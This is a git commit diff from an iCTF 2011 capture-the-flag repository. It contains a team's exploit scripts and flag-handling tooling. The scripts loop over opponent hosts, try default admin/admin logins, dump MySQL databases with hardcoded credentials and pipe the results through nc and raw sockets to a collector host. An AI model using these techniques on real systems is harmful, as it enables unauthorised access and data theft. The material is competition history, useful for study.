ctf-2011
old assets from capture-the-flag ictf 2011
git clone https://9o.is/git/ctf-2011.git
commit d3127018d887ae87dcfb42d50f4d633ba43fd758 Author: Jul <jul@9o.is> Date: Tue, 18 Dec 2012 13:25:16 -0500 Init Diffstat:
513 files changed, 6386 insertions(+), 0 deletions(-)
diff --git a/enable_forwarding.sh b/enable_forwarding.sh @@ -0,0 +1,9 @@ +#!/bin/bash + +#Enable forwarding +sudo su + +comment1="#net.ipv4.ip_forward=1" +file1="/etc/sysctl.conf" +sed -i "/"${comment1}"/ s/# *//" $file1 +sysctl -p diff --git a/enable_nat.sh b/enable_nat.sh @@ -0,0 +1,4 @@ +#!/bin/bash +# enable NAT & put it in /etc/rc.local to run it automatically during boot. +iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE +echo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE >> /etc/rc.local diff --git a/exploits and other scripts/._ex-mulemanager-admin.py b/exploits and other scripts/._ex-mulemanager-admin.py Binary files differ. diff --git a/exploits and other scripts/._ex-mulemanager.py b/exploits and other scripts/._ex-mulemanager.py Binary files differ. diff --git a/exploits and other scripts/._read-json.py b/exploits and other scripts/._read-json.py Binary files differ. diff --git a/exploits and other scripts/._riskasses.py b/exploits and other scripts/._riskasses.py Binary files differ. diff --git a/exploits and other scripts/ex-mulemanager-admin.py b/exploits and other scripts/ex-mulemanager-admin.py @@ -0,0 +1,72 @@ +#!/usr/bin/env python +import socket +import re +import mechanize +import urllib2 +import httplib + +def do(host): + try: + br = mechanize.Browser() + br.open("http://"+host+"/login.php", timeout=3.0) + + try: + br.select_form(nr=0) + except: + print 'Did not find form' + return '' + + br.form['username'] = 'admin' + br.form['password'] = 'admin' + br.submit() + + if 'ERROR: Invalid username and/or password.' in br.response().read(): + # does not work here + print 'Default admin login does not work' + return '' + + print 'Default admin login worked' + + br.open("http://"+host+'/~muleadmin/cgi-bin/groups?operation=delete', timeout=5.0) + r = br.response().read() + + if 'flg' in r: + return r + + return '' + except urllib2.URLError: + return '' + except httplib.BadStatusLine: + return '' + +def do_more(host): + try: + br = mechanize.Browser() + br.open("http://"+host+"/test.php", timeout=3.0) + r = br.response().read() + + if 'flg' in r: + print 'test.php had flags' + return r + + return '' + except urllib2.URLError: + return '' + except httplib.BadStatusLine: + return '' + +while True: + for host in ['10.13.136.3', '10.13.145.3', '10.13.188.3', '10.13.179.3', '10.13.157.3', '10.13.155.3', '10.13.190.3', '10.13.148.3', '10.13.208.3', '10.13.213.3', '10.13.165.3', '10.13.176.3', '10.13.211.3', '10.13.194.3', '10.13.185.3', '10.13.196.3', '10.13.129.3', '10.13.215.3', '10.13.146.3', '10.13.151.3', '10.13.202.3', '10.13.139.3', '10.13.174.3', '10.13.142.3', '10.13.198.3', '10.13.181.3', '10.13.206.3', '10.13.150.3', '10.13.168.3', '10.13.184.3', '10.13.169.3', '10.13.199.3', '10.13.135.3', '10.13.141.3', '10.13.177.3', '10.13.153.3', '10.13.187.3', '10.13.138.3', '10.13.152.3', '10.13.166.3', '10.13.143.3', '10.13.134.3', '10.13.163.3', '10.13.205.3', '10.13.186.3', '10.13.156.3', '10.13.180.3', '10.13.133.3', '10.13.193.3', '10.13.195.3', '10.13.154.3', '10.13.200.3', '10.13.175.3', '10.13.131.3', '10.13.170.3', '10.13.167.3', '10.13.162.3', '10.13.173.3', '10.13.212.3', '10.13.207.3', '10.13.171.3', '10.13.164.3', '10.13.140.3', '10.13.214.3', '10.13.191.3', '10.13.161.3', '10.13.192.3', '10.13.178.3', '10.13.137.3', '10.13.210.3', '10.13.159.3', '10.13.158.3', '10.13.189.3', '10.13.172.3', '10.13.182.3', '10.13.149.3', '10.13.130.3', '10.13.183.3', '10.13.203.3', '10.13.147.3', '10.13.160.3', '10.13.204.3', '10.13.144.3', '10.13.197.3', '10.13.132.3', '10.13.209.3', '10.13.201.3']: + print 'trying',host + flags = do(host) + flags += do_more(host) + + if flags: + print 'sending flags...' + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect(('10.13.147.24', 2324)) + s.send(host+'\n') + s.send('mulemanager\n') + s.send(''.join(flags.split('\n'))+'\n') + print s.recv(1024) + +\ No newline at end of file diff --git a/exploits and other scripts/ex-mulemanager.py b/exploits and other scripts/ex-mulemanager.py @@ -0,0 +1,26 @@ +#!/usr/bin/env python +import os +from socket import * + +def check_first(host, port): + s = socket(AF_INET, SOCK_STREAM) + s.settimeout(0.5) + + result = s.connect_ex((host, port)) + + ok = False + if(result == 0) : + ok = True + s.close() + + return ok + +while True: + # Down: + # Problem: + for host in ['10.13.136.3', '10.13.145.3', '10.13.188.3', '10.13.179.3', '10.13.157.3', '10.13.155.3', '10.13.190.3', '10.13.148.3', '10.13.208.3', '10.13.213.3', '10.13.165.3', '10.13.176.3', '10.13.211.3', '10.13.194.3', '10.13.185.3', '10.13.196.3', '10.13.129.3', '10.13.215.3', '10.13.146.3', '10.13.151.3', '10.13.202.3', '10.13.139.3', '10.13.174.3', '10.13.142.3', '10.13.198.3', '10.13.181.3', '10.13.206.3', '10.13.150.3', '10.13.168.3', '10.13.184.3', '10.13.169.3', '10.13.199.3', '10.13.135.3', '10.13.141.3', '10.13.177.3', '10.13.153.3', '10.13.187.3', '10.13.138.3', '10.13.152.3', '10.13.166.3', '10.13.143.3', '10.13.134.3', '10.13.163.3', '10.13.205.3', '10.13.186.3', '10.13.156.3', '10.13.180.3', '10.13.133.3', '10.13.193.3', '10.13.195.3', '10.13.154.3', '10.13.200.3', '10.13.175.3', '10.13.131.3', '10.13.170.3', '10.13.167.3', '10.13.162.3', '10.13.173.3', '10.13.212.3', '10.13.207.3', '10.13.171.3', '10.13.164.3', '10.13.140.3', '10.13.214.3', '10.13.191.3', '10.13.161.3', '10.13.192.3', '10.13.178.3', '10.13.137.3', '10.13.210.3', '10.13.159.3', '10.13.158.3', '10.13.189.3', '10.13.172.3', '10.13.182.3', '10.13.149.3', '10.13.130.3', '10.13.183.3', '10.13.203.3', '10.13.147.3', '10.13.160.3', '10.13.204.3', '10.13.144.3', '10.13.197.3', '10.13.132.3', '10.13.209.3', '10.13.201.3']: + print host + if check_first(host, 3306): + print 'up' + os.system('(echo '+host+' && echo mulemanager && ./timeout3 -t 10 mysqldump5 -h '+host+' -umulemanager -pgrabthiswhileyoucan mulemanager|grep flg)|nc 10.13.147.24 2324') + +\ No newline at end of file diff --git a/exploits and other scripts/read-json.py b/exploits and other scripts/read-json.py @@ -0,0 +1,19 @@ +#!/usr/bin/env python +import urllib2 +from socket import * +import time + +s = socket(AF_INET, SOCK_STREAM) +s.connect_ex(('10.13.147.24', 55555)) + +while True: + print 'Getting jsons' + f = urllib2.urlopen('http://192.35.222.36/index.json') + for l in f.readlines(): + print 'pasting one' + s.send(l) + f.close() + time.sleep(120) + +s.close() + diff --git a/exploits and other scripts/riskasses.py b/exploits and other scripts/riskasses.py @@ -0,0 +1,757 @@ +#!/usr/bin/env python +import socket +import threading +import SocketServer +from datetime import datetime +import re +import pickle +import time +import json +from termcolor import colored, cprint +from pprint import pprint as pp +import ipaddr +import threading +import urllib2 +import sys + +class ictf: + # Risk assesment and money laundering library based on + # http://ictf.cs.ucsb.edu/iCTF_2011_Description.txt + # + # Missing Information, that will be provided at beginning of iCTF2011: + + # - Regular expression for flags + #flag_re = r'[A-Fa-f0-9]{40}' + # like: 00583d5e55f0f54a9510201de7bbe7c7ba07 + flag_re = r'flg[0-9a-f]{36}' + + # - ID of this team + my_id = "HakM@ri$t" + + # - Overall risk function + def risk_function(self, R, M, N, Q): + ''' Calculates the risk, using the following input: + R: Risk associated with service (float, probability, <= 1) + M: Amount of money to launder + N: Amount of money that has been laundered through that team by us + Q: Amount of money that has been laundered through that svc by us + + Must return a probability (float smaller/equal 1.0)''' + + return ((R*(M/10.0))+0.5*((N-700.0)/(300.0+ abs(N-700.0) )+1) + 0.5*((Q-1500.0)/(300.0+ abs(Q-1500.0)) +1.0))/3.0 + + + # - Submit launder requests + def _launder_request(self, amount, flag): + '''Must return a tuple with the following format: + (result, points_gained, msg, exploited_team, exploited_svc) with + state: "SUCCESS", "BAD_FLAG", "OLD_FLAG", "BAD_LUCK" or + "OTHER" + points_gained: amount of points gained + msg: whatever flugsubmission returned + exploited_team, exploited_svc: if msg contains that information, + include team/svc id, otherwise None''' + + u = urllib2.urlopen('http://bubbles.ictf2011.info:8082/launder?flag='+\ + flag+'&amount='+str(int(amount))+'&fc=5fe2f7cc3e920e546613687b238117e1') + status_line = u.readlines()[-1].strip() + + if status_line == 'You submitted an old flag, be faster next time': + return ("OLD_FLAG", 0.0, '', None, None) + elif status_line == 'Flag already submitted': + return ("OLD_FLAG", 0.0, 'Flag already submitted', None, None) + elif 'You successfully laundered' in status_line: + # <br>You have 224 CHFs left<br>Your overall risk O is 0.00 based on risk(service 4) R:0.20, amount M:0, overall amount N:0 global amount Q:0<br>Your conversion would be: M: 0 P: 0.18 D: 0.58<br/>Your random value of [0,1] is 0.73<br>You successfully laundered 0 CHFs into 0.04 points + points_gained = float(status_line.split(' ')[-2]) + money_left = int(status_line.split(' ')[2]) + return ("SUCCESS", points_gained, status_line, None, None) + elif status_line == 'Unknown error -4578': + # Try again, but might backfire + return self._launder_request(amount, flag) + elif 'You got caught by the feds...' in status_line: + return ("BAD_LUCK", 0.0, status_line, None, None) + elif status_line in ['You submitted an invalid flag', 'invalid flag']: + return ("BAD_FLAG", 0.0, '', None, None) + else: + print 'Got unknown flag response:','|'+status_line+'|' + return ("OTHER", 0.0, status_line, None, None, money_left) + + # - Submit betrayal requests + def _betrayal_request(self, flag): + '''Must return a tuple with the following format: + (result, msg, from_team, from_service) with state being: + "SUCCESS", "OLD_FLAG", "BAD_FLAG" or "OTHER" + and msg whatever flugsubmission returned + from_team, from_service if msg contains that information, + include team/svc id, otherwise None''' + + u = urllib2.urlopen('http://bubbles.ictf2011.info:8082/launder?flag='+\ + flag+'&amount='+str(int(amount))+'&fc=5fe2f7cc3e920e546613687b238117e1') + status_line = u.readlines()[-1].strip() + + if status_line == 'You submitted an old flag, be faster next time': + return ("OLD_FLAG", '', None, None) + elif status_line == 'Flag already submitted': + return ("OLD_FLAG", 'Flag already submitted', None, None) + else: + print 'Got unknown flag response:','|'+status_line+'|' + return ("OTHER", status_line, None, None) + + # THAT'S IT! NOTHING TO DONE BELOW + + # - State Pusher receive port + recv_port = 55555 + + def __init__(self, my_id=my_id): + self.teams = {} + # Format: + # { "TEAM1_ID": {'money': 123, + # 'points': 123, + # 'svc_up': ["SVC1_ID",...], + # 'svc_comp': ["SVC99_ID",...], + # 'N': {"TEAM2_ID": 4, ...}, + # 'Q': {"SVC1_ID": 6, ...} + # 'D': 0.33, + # 'subnet': '1.2.3.0/24', + # 'challenges_solved': [30, 5391, 305]} + + self.services = {} + # Format: + # { "SVC1_ID": {'C': 0.33, # cut in Percentage/100 + # 'P': 0.67, # profit in Percentage/100 + # 'R': 0.1} # risk in Probability + + self.transactions = [] + # Format: + # [{ 'time_used': datetime.now(), # Time of usage + # 'flag': 'fooBAR', # String associated with flag + # 'time_stolen': ..., # As found in unused_flags + # 'from_team': 'TEAM1_ID', # As found in unused_flags + # 'from_service': 'SVC1_ID', # As found in new_flag + # 'action': 'laundering', # "betrayal" or "laundering" + # 'money_given': 12.3, # if "laundering", otherwise 0.0 + # 'points_gained': 12.3, # if "laundering" and successfull, + # # otherwise 0.0 + # 'result': "SUCCESS", # "SUCCESS", "BAD_FLAG", "BAD_LUCK", + # # "OLD_FLAG" or "OTHER" + # 'msg': 'Flag sub. suc.', # Whatever flagsubmission returned + # },...] + + self.unused_flags = [] + # Format: + # [{ 'flag': 'fooBAR', # String associated with flag + # 'time_received': ..., # Time of reception + # 'from_team': 'TEAM1_ID', # Where did it come from? + # # if unknown, None + # 'from_service': 'SVC1_ID', # Where did it come from? + # # if unknown, None + # },...] + + self.all_flags = [] + # List of all flags ever put in unused_flags or transactions + + self.my_id = my_id + self.recv_state_socket = None + self.recv_state_thread = None + self.recv_flag_server = None + + self.flag_dissipater_instance = None + + # Do you want every tick to produce a message? + self.show_ticks = True + self.tick_callback = self.print_scorboard + + def get_risks(self, amount, service=None, team=None): + '''Compiles a list of tuples describing the risk associated in + laundering *amount* money through each team and service, except + our self. + + Returned list of tuples has the following format: + [(team_id, service_id, risk),...] + + If service and team are given, only one risk will be returned.''' + + current_risks = [] + + if team and service: + N = 0 + if team in self.my_state['N']: + # The next line may needs to be exchanged by the following + # t['N'][self.my_id] + N = self.my_state['N'][team] + + Q = 0 + if service in self.my_state['Q']: + Q = self.my_state['Q'][service] + + return self.risk_function(self.services[service]['R'], amount, N, Q) + + for t_id,t in self.teams.items(): + # Ignore myself + if t_id == self.my_id: + continue + + N = 0 + if t_id in self.my_state['N']: + # The next line may needs to be exchanged by the following + # t['N'][self.my_id] + N = self.my_state['N'][t_id] + + for s_id,s in self.services.items(): + Q = 0 + if s_id in self.my_state['Q']: + Q = self.my_state['Q'][s_id] + + current_risks.append( + (t_id, s_id, self.risk_function(s['R'], amount, N, Q))) + + return current_risks + + def get_payoffs(self, amount, service=None): + '''Gives a quantitative prediction on how good a service would payoff + using it to launder *amount* money. + + If *defense* is not set, the quotient will be assumed 1.0 (meaning no + defense penalty) + + Returned list of tuples has the following format: + [(service_id, payoff_prediction),...] + + If service is given, only that payoff will be returned''' + + if service: + s = self.services[service] + after_cut = amount*(1.0-s['C']) # cut is given as percentage + return after_cut*s['P']*self.my_state['D'] + + payoffs = [] + + for s_id,s in self.services.items(): + # Payoff fuction: (amount laundered - cut) * defense% * payoff% + after_cut = amount*(1.0-s['C']) # cut is given as percentage + payoffs.append((s_id, after_cut*s['P']*self.my_state['D'])) + + return payoffs + + def parse_pushed_state(self, json_input): + ''' Updates self.teams and self.services + For format of members, see _init__() + and for json see: http://ictf.cs.ucsb.edu/your_pusher.txt + + Be careful to create new teams and services as they appear!''' + for json_line in json_input.split('\n'): + try: + state = json.loads(json_line) + assert type(state) == dict, 'Has to be a dict' + except Exception, err: + return + + if state['tick'] <= self.tick: + continue + + self.tick = state['tick'] + + for s_id,s in state['services'].items(): + # Parse + s['C'] = s['C']/100.0 + s['P'] = s['P']/100.0 + s['R'] = s['R']/100.0 + + # Create service if necessary + if s_id not in self.services: + self.services[s_id] = s + else: + # Or just update + self.services[s_id].update(s) + + for t_id,t in state['teams'].items(): + # Parse + t['D'] = t['D']/100.0 + + # Subnet to ipaddr.IPv4Network object + t['subnet'] = ipaddr.IPv4Network(t['subnet']) + + # N, Q, money, points and challenges_solved are fine like + # they are, nothing to do + + # Rename services_compromised_last_tick -> svc_up + t['svc_up'] = t['services_compromised_last_tick'] + del t['services_compromised_last_tick'] + # and services_up_last_tick -> svc_comp + t['svc_comp'] = t['services_up_last_tick'] + del t['services_up_last_tick'] + + # Create team if necessary + if t_id not in self.teams: + self.teams[t_id] = t + else: + # Or just update + self.teams[t_id].update(t) + + if self.show_ticks: + print 'New tick:',self.tick + if self.tick_callback: + self.tick_callback() + + def get_flag(self, flag, remove=False): + r = filter(lambda x: x['flag']==flag, self.unused_flags) + + if r: + if remove: + self.unused_flags.remove(r[0]) + return r[0] + else: + return None + + def launder(self, amount, flag_data): + '''Tries to launder *amount* money with flag contained in *flag_data* + *flag_data* must have same format as in unused_flags, see __init__() + and should have been poped (removed) from unused_flags. + + Returns (result, points_gained, msg)''' + + assert amount<=self.teams[self.my_id]['money'], 'Insufficient funds.' + + result, points_gained, msg, from_team, from_service = \ + self._launder_request(amount, flag_data['flag']) + + # If from_team or from_service were returned on request, use them, + # they must be correct + if from_team: + flag_data['from_team'] = from_team + if from_service: + flag_data['from_service'] = from_service + + flag_data['time_used'] = datetime.now() + flag_data['action'] = 'laundering' + flag_data['money_given'] = amount + flag_data['points_gained'] = points_gained + flag_data['result'] = result + flag_data['msg'] = msg + + # Reduce our left-over money + if result in ["SUCCESS", "BAD_LUCK"]: + self.teams[self.my_id]['money'] -= amount + # Own points are not used for anything, thus need no update + + self.transactions.append(flag_data) + + return (result, points_gained, msg) + + def betray(self, flag_data): + '''Tries to betray others with flag contained in *flag_data* + *flag_data* must have same format as in unused_flags, see __init__() + and should have been poped (removed) from unused_flags. + + Returns (result, msg)''' + + result, msg, from_team, from_service = \ + self._betrayal_request(flag_data['flag']) + + # If from_team or from_service were returned on request, use them, + # they must be correct + if from_team: + flag_data['from_team'] = from_team + if from_service: + flag_data['from_service'] = from_service + + flag_data['time_used'] = datetime.now() + flag_data['action'] = 'betrayal' + flag_data['money_given'] = 0.0 + flag_data['points_gained'] = 0.0 + flag_data['result'] = result + flag_data['msg'] = msg + + self.transactions.append(flag_data) + + return (result, msg) + + def add_new_flag(self, flag, team, service): + if flag in self.all_flags: + return False + self.all_flags.append(flag) + + flag_data = { + 'flag': flag, + 'time_received': datetime.now(), + 'from_team': team, + 'from_service': service, + } + + self.unused_flags.append(flag_data) + return True + + @property + def my_state(self): + return self.teams[self.my_id] + + def start_state_receiver(self, host="localhost", port=recv_port): + assert not self.recv_state_socket, 'Server has already been started!' + + class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler): + def handle(self_server): + try: + f = self_server.request.makefile("rb") + while True: + self.parse_pushed_state(f.readline()) + except: + return + + class ThreadedTCPServer(SocketServer.ThreadingMixIn, \ + SocketServer.TCPServer): + pass + + self.recv_state_socket = ThreadedTCPServer((host, port), \ + ThreadedTCPRequestHandler) + ip, port = self.recv_state_socket.server_address + + # Start a thread with the server -- that thread will then start one + # more thread for each request + self.recv_state_thread = threading.Thread( \ + target=self.recv_state_socket.serve_forever) + # Exit the server thread when the main thread terminates + self.recv_state_thread.daemon = True + self.recv_state_thread.start() + + return ip, port + + def stop_state_receiver(self): + if self.recv_state_socket: + self.recv_state_socket.shutdown() + self.recv_state_socket = None + + def find_team(self, needle): + if needle in self.teams.keys(): + return needle + + try: + ip = ipaddr.IPv4Address(needle) + teams = filter(lambda x: ip in x[1]['subnet'], self.teams.items()) + if teams: + return teams[0][0] + except: + pass + + team_ids = map(lambda x: (x[0], x[1]['subnet'].ip.exploded.split('.')[2]), \ + self.teams.items()) + teams = filter(lambda x: needle in x[1], team_ids) + if teams: + return teams[0][0] + + return None + + def start_flag_receiver(self, host="localhost", port=0): + assert not self.recv_flag_server, 'Server has already been started!' + self.recv_flag_server = {} + + class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler): + def handle(self_server): + try: + f = self_server.request.makefile("rb") + + f.write("Which team? Number, IP or name\n") + team = self.find_team(f.readline().strip()) + if team == None: + f.write('Unknown team!\n') + return + + f.write("Which service? Choices: "+ \ + str(self.services.keys())+"\n") + service = f.readline().strip() + if service not in self.services.keys(): + f.write('Unknown service!\n') + return + + while True: + recv = f.readline() + if not recv: break + + counter_new, counter_old = 0, 0 + for m in re.finditer(self.flag_re, recv): + if self.add_new_flag(m.group(0), team, service): + counter_new += 1 + else: + counter_old += 1 + + if counter_new: + print counter_new," new flags received!" + if counter_new or counter_old: + self_server.request.send(str(counter_new)+ \ + ' new and '+str(counter_old)+' old flags.\n') + else: + self_server.request.send('No flags :(\n') + except Exception, e: + # Client may have disconnected + return + + class ThreadedTCPServer(SocketServer.ThreadingMixIn, \ + SocketServer.TCPServer): + pass + + self.recv_flag_server['socket'] = ThreadedTCPServer((host, port), \ + ThreadedTCPRequestHandler) + ip, port = self.recv_flag_server['socket'].server_address + self.recv_flag_server['ip'] = ip + self.recv_flag_server['port'] = port + + # Start a thread with the server -- that thread will then start one + # more thread for each request + self.recv_flag_server['thread'] = threading.Thread( \ + target=self.recv_flag_server['socket'].serve_forever) + # Exit the server thread when the main thread terminates + self.recv_flag_server['thread'].daemon = True + self.recv_flag_server['thread'].start() + + return ip, port + + def stop_flag_receiver(self): + if self.recv_flag_server: + self.recv_flag_server['socket'].shutdown() + del self.recv_flag_server + + def print_scorboard(self, sort_by='points', reverse=True): + print + print "Scorboard as of tick",str(self.tick)+':' + + teams = sorted(self.teams.items(), key=lambda x: x[1][sort_by], \ + reverse=reverse) + cprint('% 25s % 8s % 8s % 7s' % \ + ('Team', 'Points', 'Money', 'Chal.'), attrs=['bold']) + for t_id,t in teams: + if t_id == self.my_id: + cprint('% 25s % 8i % 8i % 7i' % \ + (t_id, t['points'], t['money'], len(t['challenges_solved'])), \ + 'blue', 'on_red') + else: + print '% 25s % 8i % 8i % 7i' % \ + (t_id, t['points'], t['money'], len(t['challenges_solved'])) + + def print_risks(self, amount, reverse=False): + print + print "Risks for converion of",amount,"as of tick",str(self.tick)+':' + + risks = sorted(self.get_risks(amount), key=lambda x: x[2], \ + reverse=reverse) + cprint('% 25s % 15s % 6s' % \ + ('Team', 'Service', 'Risk'), attrs=['bold']) + for t_id,s_id,risk in risks: + have_flags = False + for f in self.unused_flags: + if f['from_team'] == t_id and f['from_service'] == s_id: + have_flags = True + break + + if have_flags: + cprint('% 25s % 15s % 6.2f' % \ + (t_id, s_id, risk), 'blue', 'on_red') + else: + print '% 25s % 15s % 6.2f' % (t_id, s_id, risk) + + def print_payoffs(self, amount, reverse=True): + print + print "Payoffs for conversion of",amount,"as of tick",str(self.tick)+':' + + payoffs = sorted(self.get_payoffs(amount), key=lambda x: x[1], \ + reverse=reverse) + cprint('% 15s % 8s' % \ + ('Service', 'Payoff'), attrs=['bold']) + for s_id,payoff in payoffs: + have_flags = False + for f in self.unused_flags: + if f['from_service'] == s_id: + have_flags = True + break + + if have_flags: + cprint('% 15s % 8.0f' % \ + (s_id, payoff), 'blue', 'on_red') + else: + print '% 15s % 8.0f' % (s_id, payoff) + + def print_expectancy(self, amount, cutoff=None): + flags = [] + + for f in self.unused_flags: + r = self.get_risks(amount, service=f['from_service'], \ + team=f['from_team']) + p = self.get_payoffs(amount, service=f['from_service']) + + if not cutoff or amount*(1-r)*p > cutoff: + flags.append((f['flag'], (1-r)*p)) + + flags = sorted(flags, key=lambda x: x[1], reverse=True) + + print + print 'Payoff expectancy for',amount,'as of tick',str(self.tick)+':' + cprint('% 12s % 40s' % \ + ('Exp.Points', 'Flag'), attrs=['bold']) + for flag,payoff in flags: + print '% 12.0f % 40s' % (payoff,flag) + + def print_transactions(self, num=20): + # 'time_used': datetime.now(), # Time of usage + # 'flag': 'fooBAR', # String associated with flag + # 'time_stolen': ..., # As found in unused_flags + # 'from_team': 'TEAM1_ID', # As found in unused_flags + # 'from_service': 'SVC1_ID', # As found in new_flag + # 'action': 'laundering', # "betrayal" or "laundering" + # 'money_given': 12.3, # if "laundering", otherwise 0.0 + # 'points_gained': 12.3, # if "laundering" and successfull, + # # otherwise 0.0 + # 'result': "SUCCESS", # "SUCCESS", "BAD_FLAG", "BAD_LUCK", + # # "OLD_FLAG" or "OTHER" + # 'msg': 'Flag sub. suc.' + print + print 'Latest transactions:' + print '% 7s % 20s % 10s % 10s % 8s % 20s' % \ + ('Time', 'Team', 'Service', 'Result', 'Points', 'Return Message') + for t in self.transactions[num*-1:]: + time = t['time_used'].time() + print '% 7s % 20s % 10s % 10s % 8i % 20s' % \ + (str(time.hour)+':'+str(time.minute), \ + t['from_team'], t['from_service'], t['result'], \ + t['points_gained'], t['msg']) + + + def __getstate__(self): + '''Needed for pickleability... (sockets can not be pickled)''' + new_dict = self.__dict__ + new_dict['recv_flag_server'] = None + new_dict['recv_state_thread'] = None + new_dict['recv_state_socket'] = None + new_dict['tick_callback'] = None + new_dict['flag_dissipater_instance'] = None + + return new_dict + + def backup(self, filename='ictf2011.backup'): + pickle.dump(self, open(filename, 'w')) + + @staticmethod + def load(filename='ictf2011.backup'): + return pickle.load(open(filename)) + + def stop_flag_dissipater(self): + if self.flag_dissipater_instance: + self.flag_dissipater_instance.stop = True + + def start_flag_dissipater(self): + if not self.flag_dissipater_instance: + return + + class flag_dissipater(threading.Thread): + stop = False + cutoff = 0.75 + + def run(self): + '''Runs until stop is set to True + Will "sell" all flags with expectancy over cutoff and use + all others to compromise other people services + TODO''' + while not stop: + time.sleep(30) + # TODO + print 'foo' + + self.flag_dissipater_instance = flag_dissipater() + self.flag_dissipater_instance.start() + + def start(self): + self.start_state_receiver('10.13.147.24',55555) + self.start_flag_receiver('10.13.147.24',2323) + + def submit_flags(self, aimed_risk=0.2, min_payoff=0.70): + while len(self.unused_flags): + f = self.unused_flags.pop() + # calc amount: + amount = 2 + calc_risk = self.get_risks(amount, f['from_service'], f['from_team']) + while calc_risk < aimed_risk and amount < self.my_state['money']: + amount += 1 + calc_risk = self.get_risks(amount, f['from_service'], f['from_team']) + + payoff = self.services[f['from_service']]['P'] + if payoff < min_payoff: + print 'To small payoff',payoff,'using minimum amount' + amount = 2 + + s = self.launder(amount-1, f) + if s[0] == 'OTHER': + break + if s[0] == 'SUCCESS': + print "Converted",amount,"CHFs to",s[1],"points. Predicted",self.get_payoffs(amount-1,f['from_service']),s[5],'CHFs left' + if s[0] == 'BAD_LUCK': + print "Lost",amount,"CHFs, risk was",calc_risk + + if len(self.unused_flags) % 10 == 0: + print len(self.unused_flags),'to go' + +def client(ip, port, messages): + '''Just for debugging and testing purposes''' + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((ip, port)) + try: + for message in messages: + sock.send(message) + finally: + sock.close() + +if __name__ == '__main__': + ctf = ictf() + ip, port = ctf.start_state_receiver() + + # Run test data through here! + client(ip, port, '{"services": {"S1": {"P": 58, "C": 3, "R": 10}, "foobar": {"P": 98, "C": 42, "R": 90}, "hogwarts": {"P": 60, "C": 10, "R": 5}}, "tick": 666, "teams": {"A-team": {"subnet": "127.0.0.0/24", "D": 70, "services_compromised_last_tick": ["foobar", "S1"], "money": 395, "N": { "Justice League" : 600 }, "Q": {"S1": 10, "foobar": 10000}, "points": 394, "services_up_last_tick": ["S1", "foobar", "hogwarts"], "challenges_solved": [10, 971, 424242]}, "Justice League": {"subnet": "10.230.230.0/24", "D": 30, "services_compromised_last_tick": ["hogwarts"], "money": 3859, "N": { "foobar" : 6093 }, "Q": {"hogwarts": 1093, "foobar": 10000}, "points": 10293, "services_up_last_tick": ["hogwarts"], "challenges_solved": [30, 5391, 305]}}}'+ \ + "\nIf you can read this on your console, that is good :) (test passed)") + + time.sleep(1) + t = ctf.teams['Justice League'] + assert t['svc_comp'] == ['hogwarts'], 'Justice League.svc_comp not received' + assert t['svc_up'] == ['hogwarts'], 'Justice League.svc_up not received' + assert t['points'] == 10293, 'Justice League.points not received' + assert t['money'] == 3859, 'Justice League.money not received' + assert t['N']['foobar'] == 6093, 'Justice League.N not received' + + s = ctf.services['foobar'] + assert s['C'] == 42/100.0, 'foobar.C not received' + assert s['P'] == 98/100.0, 'foobar.P not received' + assert s['R'] == 90/100.0, 'foobar.R not received' + + ctf.start_flag_receiver() + time.sleep(1) + ip, port = ctf.recv_flag_server['ip'], \ + ctf.recv_flag_server['port'] + client(ip, port, ["Justice League\n","foobar\n","ABCDEFGHIJKLMNOPQRSTUVWXYZ!\n"]) + client(ip, port, ["230\n","S1\n","ABCDEFGHIJKLFOOPQRSTUVWXYZ!\n"]) + client(ip, port, ["10.230.230.3\n","hogwarts\n","FOOBARGHIJKLMNOPQRSTUVWXYZ!\n", \ + "!!BARFOOBAZ!!\n","BLUBBER!\n","BAR\n"]) + time.sleep(1) + assert 'FOO' in ctf.all_flags, 'Flag FOO not recognized' + assert 'BAR' in ctf.all_flags, 'Flag BAR not recognized' + assert 'BAZ' in ctf.all_flags, 'Flag BAZ not recognized' + assert len(ctf.unused_flags) == 3, 'Flags did not make it in unused_flags' + + ctf.stop_flag_receiver() + ctf.stop_state_receiver() + + ctf.backup() + new_ctf = ictf.load() + + assert new_ctf.get_risks(100) == ctf.get_risks(100), 'Dump and reload faulty' + assert new_ctf.get_payoffs(100) == ctf.get_payoffs(100), 'Dump and reload faulty' + del new_ctf + + ctf.print_scorboard() + ctf.print_risks(1000) + ctf.print_payoffs(1000) + ctf.print_expectancy(1000) + + print ctf.launder(100, ctf.get_flag('FOO',remove=True)) + assert None == ctf.get_flag('FOO'), 'get_flag(f, remove=True) failed' + assert 'FOO' == ctf.transactions[-1]['flag'], 'Transaction failed' + print ctf.betray(ctf.get_flag('BAR',remove=True)) + assert 'BAR' == ctf.transactions[-1]['flag'], 'Transaction failed' + + ctf.print_transactions() + + print 'ok' diff --git a/flag-tracker/.DS_Store b/flag-tracker/.DS_Store Binary files differ. diff --git a/flag-tracker/facebox/closelabel.png b/flag-tracker/facebox/closelabel.png Binary files differ. diff --git a/flag-tracker/facebox/facebox.css b/flag-tracker/facebox/facebox.css @@ -0,0 +1,80 @@ +#facebox { + position: absolute; + top: 0; + left: 0; + z-index: 100; + text-align: left; +} + + +#facebox .popup{ + position:relative; + border:3px solid rgba(0,0,0,0); + -webkit-border-radius:5px; + -moz-border-radius:5px; + border-radius:5px; + -webkit-box-shadow:0 0 18px rgba(0,0,0,0.4); + -moz-box-shadow:0 0 18px rgba(0,0,0,0.4); + box-shadow:0 0 18px rgba(0,0,0,0.4); +} + +#facebox .content { + display:table; + width: 570px; + padding: 10px; + background: #fff; + -webkit-border-radius:4px; + -moz-border-radius:4px; + border-radius:4px; +} + +#facebox .content > p:first-child{ + margin-top:0; +} +#facebox .content > p:last-child{ + margin-bottom:0; +} + +#facebox .close{ + position:absolute; + top:5px; + right:5px; + padding:2px; + background:#fff; +} +#facebox .close img{ + opacity:0.3; +} +#facebox .close:hover img{ + opacity:1.0; +} + +#facebox .loading { + text-align: center; +} + +#facebox .image { + text-align: center; +} + +#facebox img { + border: 0; + margin: 0; +} + +#facebox_overlay { + position: fixed; + top: 0px; + left: 0px; + height:100%; + width:100%; +} + +.facebox_hide { + z-index:-100; +} + +.facebox_overlayBG { + background-color: #000; + z-index: 99; +} diff --git 